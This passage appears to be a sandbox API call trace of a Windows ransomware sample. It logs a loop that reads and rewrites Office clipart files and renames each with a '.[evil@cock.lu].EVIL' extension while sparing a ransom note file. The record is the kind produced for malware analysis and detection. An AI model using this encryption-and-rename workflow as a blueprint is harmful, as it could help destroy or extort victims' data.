lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf.[evil@cock.lu].evil")) returned 1 [0158.945] ??_V@YAXPEAX@Z () returned 0x1 [0158.948] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF", dwFileAttributes=0x200) returned 0 [0158.949] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.949] wcsstr (_Str="NA00806_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.949] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF") returned 69 [0158.949] wcscmp (_String1="NA00806_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.949] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00806_.WMF") returned 0x0 [0158.949] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF") returned 0x45 [0158.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.951] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x788, lpOverlapped=0x0) returned 1 [0158.961] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.961] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.961] _errno () returned 0x84b1160840 [0158.961] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.961] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a0, lpOverlapped=0x0) returned 1 [0158.962] CloseHandle (hObject=0x1a8) returned 1 [0158.962] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.962] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.962] __uncaught_exception () returned 0x84b1160800 [0158.962] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf.[evil@cock.lu].evil")) returned 1 [0158.963] ??_V@YAXPEAX@Z () returned 0x1 [0158.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF", dwFileAttributes=0x200) returned 0 [0158.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.967] wcsstr (_Str="NA00807_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF") returned 69 [0158.967] wcscmp (_String1="NA00807_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00807_.WMF") returned 0x0 [0158.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF") returned 0x45 [0158.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.970] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xba4, lpOverlapped=0x0) returned 1 [0158.973] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.973] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.973] _errno () returned 0x84b1160840 [0158.973] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.973] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbc0, lpOverlapped=0x0) returned 1 [0158.974] CloseHandle (hObject=0x1a8) returned 1 [0158.974] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.974] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.974] __uncaught_exception () returned 0x84b1160800 [0158.974] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.974] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf.[evil@cock.lu].evil")) returned 1 [0158.975] ??_V@YAXPEAX@Z () returned 0x1 [0158.979] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF", dwFileAttributes=0x200) returned 0 [0158.979] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.979] wcsstr (_Str="NA00808_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.979] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF") returned 69 [0158.979] wcscmp (_String1="NA00808_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.979] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00808_.WMF") returned 0x0 [0158.979] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF") returned 0x45 [0158.979] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.981] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x514, lpOverlapped=0x0) returned 1 [0158.991] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.991] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.992] _errno () returned 0x84b1160840 [0158.992] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.992] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x520, lpOverlapped=0x0) returned 1 [0158.992] CloseHandle (hObject=0x1a8) returned 1 [0158.992] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.992] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.992] __uncaught_exception () returned 0x84b1160800 [0158.992] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.993] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf.[evil@cock.lu].evil")) returned 1 [0158.994] ??_V@YAXPEAX@Z () returned 0x1 [0158.997] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF", dwFileAttributes=0x200) returned 0 [0158.997] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.997] wcsstr (_Str="NA00809_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.997] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF") returned 69 [0158.997] wcscmp (_String1="NA00809_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.998] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00809_.WMF") returned 0x0 [0158.998] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF") returned 0x45 [0158.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.000] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x608, lpOverlapped=0x0) returned 1 [0159.005] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.005] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.005] _errno () returned 0x84b1160840 [0159.005] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.005] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0159.006] CloseHandle (hObject=0x1a8) returned 1 [0159.006] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.006] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.006] __uncaught_exception () returned 0x84b1160800 [0159.006] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.006] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf.[evil@cock.lu].evil")) returned 1 [0159.007] ??_V@YAXPEAX@Z () returned 0x1 [0159.011] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF", dwFileAttributes=0x200) returned 0 [0159.011] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.011] wcsstr (_Str="NA00810_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.011] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF") returned 69 [0159.011] wcscmp (_String1="NA00810_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.011] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00810_.WMF") returned 0x0 [0159.011] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF") returned 0x45 [0159.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.013] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd58, lpOverlapped=0x0) returned 1 [0159.021] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.021] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.021] _errno () returned 0x84b1160840 [0159.021] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.021] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd60, lpOverlapped=0x0) returned 1 [0159.021] CloseHandle (hObject=0x1a8) returned 1 [0159.021] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.021] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.021] __uncaught_exception () returned 0x84b1160800 [0159.021] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.022] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf.[evil@cock.lu].evil")) returned 1 [0159.023] ??_V@YAXPEAX@Z () returned 0x1 [0159.026] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF", dwFileAttributes=0x200) returned 0 [0159.026] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.026] wcsstr (_Str="NA00932_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.026] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF") returned 69 [0159.026] wcscmp (_String1="NA00932_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00932_.WMF") returned 0x0 [0159.026] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF") returned 0x45 [0159.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.029] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3210, lpOverlapped=0x0) returned 1 [0159.036] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.036] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.036] _errno () returned 0x84b1160840 [0159.036] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3220, lpOverlapped=0x0) returned 1 [0159.037] CloseHandle (hObject=0x1a8) returned 1 [0159.037] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.037] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.037] __uncaught_exception () returned 0x84b1160800 [0159.037] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf.[evil@cock.lu].evil")) returned 1 [0159.038] ??_V@YAXPEAX@Z () returned 0x1 [0159.042] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF", dwFileAttributes=0x200) returned 0 [0159.042] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.042] wcsstr (_Str="NA01064_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF") returned 69 [0159.042] wcscmp (_String1="NA01064_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01064_.WMF") returned 0x0 [0159.042] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF") returned 0x45 [0159.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.045] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c46, lpOverlapped=0x0) returned 1 [0159.053] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.053] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.053] _errno () returned 0x84b1160840 [0159.053] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.053] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c60, lpOverlapped=0x0) returned 1 [0159.054] CloseHandle (hObject=0x1a8) returned 1 [0159.054] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.054] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.054] __uncaught_exception () returned 0x84b1160800 [0159.054] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.054] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf.[evil@cock.lu].evil")) returned 1 [0159.055] ??_V@YAXPEAX@Z () returned 0x1 [0159.059] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF", dwFileAttributes=0x200) returned 0 [0159.059] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.059] wcsstr (_Str="NA01066_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.059] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF") returned 69 [0159.059] wcscmp (_String1="NA01066_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.059] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01066_.WMF") returned 0x0 [0159.059] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF") returned 0x45 [0159.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.062] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x54a8, lpOverlapped=0x0) returned 1 [0159.070] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.070] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.070] _errno () returned 0x84b1160840 [0159.070] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.070] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x54c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x54c0, lpOverlapped=0x0) returned 1 [0159.071] CloseHandle (hObject=0x1a8) returned 1 [0159.071] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.071] __uncaught_exception () returned 0x84b1160800 [0159.071] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf.[evil@cock.lu].evil")) returned 1 [0159.073] ??_V@YAXPEAX@Z () returned 0x1 [0159.076] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF", dwFileAttributes=0x200) returned 0 [0159.076] FindNextFileW (in: 